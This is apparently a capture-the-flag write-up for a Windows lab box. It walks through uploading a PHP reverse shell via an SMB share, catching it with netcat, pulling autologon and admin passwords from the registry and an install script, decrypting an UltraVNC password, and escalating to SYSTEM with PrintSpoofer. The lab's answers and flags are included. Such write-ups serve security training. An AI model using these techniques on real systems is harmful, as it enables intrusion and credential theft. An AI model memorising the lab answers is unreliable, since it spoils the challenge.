Uploading a PHP reverse shell (foothold)

I grabbed a PHP reverse shell from a trusted Repo and configured it with my attacking IP and port:

Next I connected to the images$ share (which maps to the webroot) with smbclient and uploaded the shell:

# connect to the images$ share
smbclient //10.10.130.54/images$

At the smb: prompt I uploaded my file:

smb: \> put shell.php
putting file shell.php as \shell.php (0.6 kb/s) (average 0.6 kb/s)
smb: \>

With the file on the webroot, I opened a local netcat listener and triggered the PHP shell via an HTTP request:

# on my machine
nc -lnvp 4444

From my machine (or another terminal) trigger the uploaded PHP

curl http://10.10.130.54/images/shell.php

Immediately the listener received a connection:

Listening on 0.0.0.0 4444
Connection received on 10.10.130.54 49918
SOCKET: Shell has connected! PID: 3140

On the remote shell I confirmed the user and environment:

C:\xampp\htdocs\images> whoami
desktop-997gg7d\sign

So the console session user was sign.

Question: What user is signed into the console session?

Answer: sign

I also enumerated shares from the shell to confirm other remote-only/admin shares:

Question: What hidden, non-standard share is only remotely accessible as an administrative account?

Answer:Installs$

Capturing User Flag

Finally, I captured the user flag from the sign desktop:

C:\Users\sign\Desktop> type user_flag.txt
thm{48u51n9_5y573m_func710n4117y_f02_fun_4nd_p20f17}

Post-exploitation

Credential discovery

Command run

reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"

Relevant output (excerpt)

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
    AutoLogonSID        REG_SZ    S-1-5-21-201290883-77286733-747258586-1001
    LastUsedUsername    REG_SZ    .\sign
    DefaultUsername     REG_SZ    .\sign
    DefaultPassword     REG_SZ    gKY1uxHLuU1zzlI4wwdAcKUw35TPMdv7PAEE5dAFbV2NxpPJVO7eeSH
    AutoAdminLogon      REG_DWORD 0x1

Finding
Auto-logon was enabled (AutoAdminLogon=1), and the registry revealed the stored credentials for the user .\\sign.

Recovered password

gKY1uxHLuU1zzlI4wwdAcKUw35TPMdv7PAEE5dAFbV2NxpPJVO7eeSH

Question: What is the Users Password?

Answer: gKY1uxHLuU1zzlI4wwdAcKUw35TPMdv7PAEE5dAFbV2NxpPJVO7eeSH

Installs$ share & UltraVNC — Credential discovery

Context
Checked the Installs$ SMB share (mapped to C:\Installs) to look for deployment scripts and installer artifacts.

Command

type C:\Installs\Install_www_and_deploy.bat

Install_www_and_deploy.bat (excerpt)

@echo off
REM Shop Sign Install Script 
cd C:\Installs
psexec -accepteula -nobanner -u administrator -p RCYCc3GIjM0v98HDVJ1KOuUm4xsWUxqZabeofbbpAss9KCKpYfs2rCi xampp-windows-x64-7.4.11-0-VC15-installer.exe ...
xcopy C:\Installs\simepleslide\src\* C:\xampp\htdocs\
move C:\xampp\htdocs\index.php C:\xampp\htdocs\index.php_orig
copy C:\Installs\simepleslide\src\slide.html C:\xampp\htdocs\index.html
mkdir C:\xampp\htdocs\images
UltraVNC_1_2_40_X64_Setup.exe /silent
copy ultravnc.ini "C:\Program Files\uvnc bvba\UltraVNC\ultravnc.ini" /y
copy startup.bat "c:\programdata\Microsoft\Windows\Start Menu\Programs\Startup\"
pause

Question: What is the Administrators Password?

Answer: RCYCc3GIjM0v98HDVJ1KOuUm4xsWUxqZabeofbbpAss9KCKpYfs2rCi

Question: What executable is used to run the installer with the Administrator username and password?

Answer: PsExec.exe

Inspect UltraVNC config — Credential discovery

Locate UltraVNC configuration file

type "C:\Program Files\uvnc bvba\UltraVNC\ultravnc.ini"

Output:

[ultravnc]
passwd=B3A8F2D8BEA2F1FA70
passwd2=00B2CDC0BADCAF1397
[admin]
UseRegistry=0
SendExtraMouse=1
Secure=0

This is an encrypted/hex-encoded blob representing the VNC password.

Decoding the UltraVNC password

• Used a community technique (see: https://github.com/frizb/PasswordDecrypts).

Command executed on an attacker Linux host

echo -n B3A8F2D8BEA2F1FA70 | xxd -r -p | \
  openssl enc -des-cbc --nopad --nosalt -K e84ad660c4721ae0 -iv 0000000000000000 -d | hexdump -Cv

Output hexdump (truncated):

00000000  35 75 70 70 30 72 74 39                           |5upp0rt9|

Decoded VNC password:

5upp0rt9

Question: What is the VNC Password?

Answer: 5upp0rt9

Privilege Escalation & Root Flag Capture

Privilege enumeration
During enumeration, we found that the current user had the SeImpersonatePrivilege enabled, which allows impersonating other users, including SYSTEM.

Command

whoami /priv

Relevant output

Privilege Name                Description                               State   
============================= ========================================= ========
SeShutdownPrivilege           Shut down the system                      Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeUndockPrivilege             Remove computer from docking station      Disabled
SeImpersonatePrivilege        Impersonate a client after authentication Enabled   <--
SeCreateGlobalPrivilege       Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled 
SeTimeZonePrivilege           Change the time zone                      Disabled

Exploiting SeImpersonatePrivilege with PrintSpoofer

To escalate to NT AUTHORITY\SYSTEM, we leveraged the PrintSpoofer payload.

Step 1: Download PrintSpoofer

wget https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer64.exe

Step 2: Upload the binary to the target via SMB

smb: \> put PrintSpoofer64.exe

Step 3: Execute PrintSpoofer on the target

C:\xampp\htdocs\images>PrintSpoofer64.exe -i -c cmd

Output

[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK
Microsoft Windows [Version 10.0.18362.1256]
(c) 2019 Microsoft Corporation. All rights reserved.
C:\Windows\system32>

Capturing the Root Flag

• With SYSTEM privileges, we accessed the Administrator desktop flag:

type "C:\Users\Administrator\Desktop\admin_flag.txt"

Flag

thm{p455w02d_c4n_83_f0und_1n_p141n_73x7_4dm1n_5c21p75}